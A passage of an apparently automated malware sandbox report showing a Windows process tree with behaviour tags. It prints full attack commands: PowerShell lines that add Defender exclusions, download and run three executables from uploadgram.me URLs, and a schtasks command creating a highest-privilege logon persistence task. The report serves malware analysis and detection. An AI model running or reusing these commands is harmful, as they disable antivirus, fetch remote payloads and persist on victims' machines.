                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:5184
                                                                                                                                                                  • C:\Users\Admin\Documents\S1sjduHt4oZSKIrhRvvz5UoZ.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\S1sjduHt4oZSKIrhRvvz5UoZ.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5172
                                                                                                                                                                      • C:\Users\Admin\Documents\S1sjduHt4oZSKIrhRvvz5UoZ.exe
                                                                                                                                                                        C:\Users\Admin\Documents\S1sjduHt4oZSKIrhRvvz5UoZ.exe
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:6748
                                                                                                                                                                      • C:\Users\Admin\Documents\gTyfXHLPjYQys6i0fK4X6aFd.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\gTyfXHLPjYQys6i0fK4X6aFd.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4208
                                                                                                                                                                        • C:\Users\Admin\Documents\Wj3TS3vCvLPeSCGh3uDDWRt3.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\Wj3TS3vCvLPeSCGh3uDDWRt3.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6272
                                                                                                                                                                          • C:\Users\Admin\Documents\aOSMfkBXyJWHiWtkM49H1meX.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\aOSMfkBXyJWHiWtkM49H1meX.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:6420
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:5104
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:7132
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:5808
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:9448
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:9956
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:7092
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:3940
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                              PID:9760
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:416
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:9328
                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:7692
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                            PID:7996
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:10172
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:9896
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:9636
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:6460
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    PID:4716
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                        PID:9700
                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:6836
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:6836
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                    PID:10208
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:3632
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      PID:10204
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:10152
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                          "{path}"
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:300
                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:9220
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\xDQTKUXOnGO2K_xjKNDhpJBt.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\xDQTKUXOnGO2K_xjKNDhpJBt.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      PID:6604
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\BmKJkyenO4wJwb3myjbTRrfh.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\BmKJkyenO4wJwb3myjbTRrfh.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:6488
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\BmKJkyenO4wJwb3myjbTRrfh.exe
                                                                                                                                                                                                                          C:\Users\Admin\Documents\BmKJkyenO4wJwb3myjbTRrfh.exe
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:5312
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\LVxiuXLyHfQ8iSdvyJMlGQcv.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\LVxiuXLyHfQ8iSdvyJMlGQcv.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                          PID:6412
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\cfspoevIPnVJIxIDRGYj00gD.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\cfspoevIPnVJIxIDRGYj00gD.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:6300
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\ERSJChS74t5yl6NMlziPh1jZ.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\ERSJChS74t5yl6NMlziPh1jZ.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:6236
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 660
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:4696
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 676
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:6488
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 632
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:7456
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 736
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:7848
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 1120
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:7028
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 1152
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:6116
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\3qP65a7WrrPHDyxEL1wGmeUd.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\3qP65a7WrrPHDyxEL1wGmeUd.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:6972
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3933425.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3933425.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:8068
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5634682.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5634682.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                    PID:8032
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6053392.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6053392.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:4688
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:7020
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                        C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:5904
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                          C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:1936
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                            C:\Users\Admin\Documents\VKkiI_EStmdEH8rV5YfXtCup.exe
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:7568
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\QR0nJSCyU5J9vEUvp73_N_GZ.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\QR0nJSCyU5J9vEUvp73_N_GZ.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:6920
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ViJTOh92PGNZfx_W5UupcTlH.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ViJTOh92PGNZfx_W5UupcTlH.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6880
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\ViJTOh92PGNZfx_W5UupcTlH.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\ViJTOh92PGNZfx_W5UupcTlH.exe" -q
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:7372
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\nAal1SAVXdQjlGBQCMJFf9eL.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\nAal1SAVXdQjlGBQCMJFf9eL.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:5928
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-VG67N.tmp\nAal1SAVXdQjlGBQCMJFf9eL.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-VG67N.tmp\nAal1SAVXdQjlGBQCMJFf9eL.tmp" /SL5="$10576,138429,56832,C:\Users\Admin\Documents\nAal1SAVXdQjlGBQCMJFf9eL.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                      PID:7128
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-0I68G.tmp\Setup.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-0I68G.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        PID:388
                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                                                                          PID:7524
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282275 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:8088
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:4720
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp5F04_tmp.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tmp5F04_tmp.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5544
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:6948
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:6672
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              cmd
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:6912
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                  findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:6324
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                    PID:4888
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:6488
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                          PID:8468
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                              PID:8784
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                PID:9044
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                    PID:8716
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                      PID:8304
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                        PID:7888
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                          PID:7492
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                            PID:6628
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                              PID:6608
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                20⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                PID:8352
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                  21⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  PID:5856
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                    PID:8172
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                      23⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                      PID:9032
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                        PID:7740
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                          PID:4416
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                            PID:7732
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                              PID:8456
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                28⤵
